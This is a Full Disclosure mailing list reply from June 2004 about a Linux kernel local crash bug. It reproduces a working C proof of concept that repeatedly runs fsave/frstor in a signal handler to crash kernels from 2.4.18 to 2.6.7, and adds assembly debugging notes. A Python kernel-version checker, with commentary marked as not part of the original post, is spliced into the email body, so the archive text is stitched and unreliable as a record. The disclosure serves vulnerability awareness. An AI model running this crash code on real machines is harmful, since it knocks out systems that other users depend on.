Full Disclosure mailing list archives
Re: linux kernel local crash seen on slashdot
From: Lorenzo Hernandez Garcia-Hierro <lorenzohgh () tuxedo-es org>
Date: Mon, 14 Jun 2004 19:13:10 +0200
Hi,
Looked through the archives here and didn't see this one yet: http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html
There is also an article on Slashdot (I've been out of the list and possibly others sent the link; anyway, I'm pasting it here): http://slashdot.org/articles/04/06/14/118209.shtml?tid=106&tid=126&tid=128&tid=185&tid=190

There is proof of concept code in some of the Slashdot comments; this is a modified version with more information (and a little change to the fsave line):

===
/* --------------------
 * frstor Local Kernel exploit
 * Crashes any kernel from 2.4.18
 * to 2.6.7 because frstor in assembler inline offsets in memory by 4.
 * Original proof of concept code
 * by stian_@_nixia.no.
 * Added some stuff by lorenzo_@_gnu.org
 * and fixed the fsave line with (*fpubuf).
 * -------------------- */

/* --------- Some debugging information made available by stian_@_nixia.no ---------
TakeDown:
        pushl %ebp
        movl %esp, %ebp
        subl $136, %esp
        leal -120(%ebp), %eax
        movl %eax, -124(%ebp)
#APP
        fsave -124(%ebp)
#NO_APP
        subl $4, %esp
        pushl $1
        pushl $.LC0
        pushl $2
        call write
        addl $16, %esp
        leal -120(%ebp), %eax
        movl %eax, -128(%ebp)
#APP
        frstor -128(%ebp)
#NO_APP
        leave
        ret
*/

#include <sys/time.h>
#include <signal.h>
#include <unistd.h>

/* SIGALRM handler: saves the x87 state into a 108-byte buffer (the size of an
 * fsave/frstor image) and restores it again, mimicking the FPU state save and
 * restore that the kernel does around the signal. */
static void TakeDown(int ignore)
{
    char fpubuf[108];
    // __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
    __asm__ __volatile__ ("fsave %0\n" : : "m"(*fpubuf));
    write(2, "*", 1);
    __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}

int main(int argc, char *argv[])
{
    struct itimerval spec;

    /* Deliver SIGALRM every 100 microseconds while main keeps writing dots. */
    signal(SIGALRM, TakeDown);
    spec.it_interval.tv_sec = 0;
    spec.it_interval.tv_usec = 100;
    spec.it_value.tv_sec = 0;
    spec.it_value.tv_usec = 100;
    setitimer(ITIMER_REAL, &spec, NULL);
    while (1)
        write(1, ".", 1);
    return 0;
}
// <<EOF
===

Cheers,

PS: My 2.4.25-gentoo seems not to be affected by this, but the bf24 flavour of my old box is vulnerable.
--
Lorenzo Hernandez Garcia-Hierro <lorenzohgh () tuxedo-es org>
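The PoC header above gives an affected range of 2.4.18 through 2.6.7, and the PS shows why a bare version number is not enough: a 2.4.25-gentoo kernel sits inside that range but was reported unaffected, while a bf24 kernel was. The following script is an added example, not part of the original post or the PoC: it parses `uname -r` style release strings (including distribution suffixes such as `-gentoo` or `-bf24`), reports whether the numeric version falls inside the range stated in the post, and separately flags vendor kernels, whose version alone does not prove exposure. The inclusive interpretation of both endpoints and the sample release strings are assumptions made for the example.

```python
import re
import platform

# Affected range as stated in the PoC header quoted in the post: 2.4.18 to 2.6.7.
# Assumption: both endpoints are treated as inclusive.
AFFECTED_MIN = (2, 4, 18)
AFFECTED_MAX = (2, 6, 7)

# Leading major.minor.patch; anything after it is treated as a vendor suffix.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)")


def parse_release(release: str) -> tuple:
    """Return (major, minor, patch) from a release string such as
    '2.4.25-gentoo' or '2.6.7-rc3'. Prerelease tags like '-rc3' are not
    ordered specially; they are treated as the version they precede."""
    m = _VERSION_RE.match(release.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release string: {release!r}")
    return tuple(int(x) for x in m.groups())


def vendor_suffix(release: str) -> str:
    """Return the text after the numeric version, e.g. '-gentoo' or '-bf24'."""
    s = release.strip()
    m = _VERSION_RE.match(s)
    return s[m.end():] if m else ""


def in_affected_range(release: str) -> bool:
    """True when the numeric version lies within the range quoted in the post."""
    return AFFECTED_MIN <= parse_release(release) <= AFFECTED_MAX


def assess(release: str) -> dict:
    """Classify one release string. 'vendor_kernel' marks releases carrying a
    distribution suffix; the post itself reports a 2.4.25-gentoo kernel inside
    the range that was not affected, so such kernels need a separate check."""
    version = parse_release(release)
    suffix = vendor_suffix(release)
    return {
        "release": release,
        "version": version,
        "in_range": AFFECTED_MIN <= version <= AFFECTED_MAX,
        "vendor_kernel": bool(suffix),
        "suffix": suffix,
    }


if __name__ == "__main__":
    # Constructed sample inputs, followed by the running host's own release.
    samples = ["2.4.18-bf24", "2.4.25-gentoo", "2.6.7", "2.6.8", "2.4.17", platform.release()]
    for rel in samples:
        try:
            r = assess(rel)
        except ValueError as e:
            print(f"{rel}: {e}")
            continue
        verdict = "in affected range" if r["in_range"] else "outside affected range"
        if r["in_range"] and r["vendor_kernel"]:
            verdict += f" (vendor kernel '{r['suffix']}'; may carry a backported fix)"
        print(f"{rel}: {verdict}")
```

Run it on a host to get a first-pass answer; for any vendor kernel inside the range, confirm with the distribution's own changelog rather than the version number.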
Attachment:
signature.asc
Description: This part of the message is digitally signed
Current thread:
- Multiple Antivirus Scanners DoS attack. [summery] bipin gautam (Jun 14)
- Re: Multiple Antivirus Scanners DoS attack. [summery] npguy (Jun 14)
- Re: Multiple Antivirus Scanners DoS attack. [summery] bipin gautam (Jun 14)
- Re: Multiple Antivirus Scanners DoS attack. [summery] Jan Muenther (Jun 14)
- Re: Multiple Antivirus Scanners DoS attack. [summery] bipin gautam (Jun 14)
- Re: Multiple Antivirus Scanners DoS attack bipin gautam (Jun 14)
- linux kernel local crash seen on slashdot Skip Duckwall (Jun 14)
- Re: linux kernel local crash seen on slashdot Lorenzo Hernandez Garcia-Hierro (Jun 14)
- Re: linux kernel local crash seen on slashdot npguy (Jun 14)
- Re: linux kernel local crash seen on slashdot Stefan SF (Jun 15)
- Re: linux kernel local crash seen on slashdot Dave Monnier, IT Security Office, Indiana University (Jun 15)
- Re: Multiple Antivirus Scanners DoS attack. [summery] bipin gautam (Jun 14)
- Re: Multiple Antivirus Scanners DoS attack. [summery] npguy (Jun 14)
- Re: Multiple Antivirus Scanners DoS attack. [summery] Jim Krok (Jun 14)
- Re: Multiple Antivirus Scanners DoS attack. [summery] npguy (Jun 14)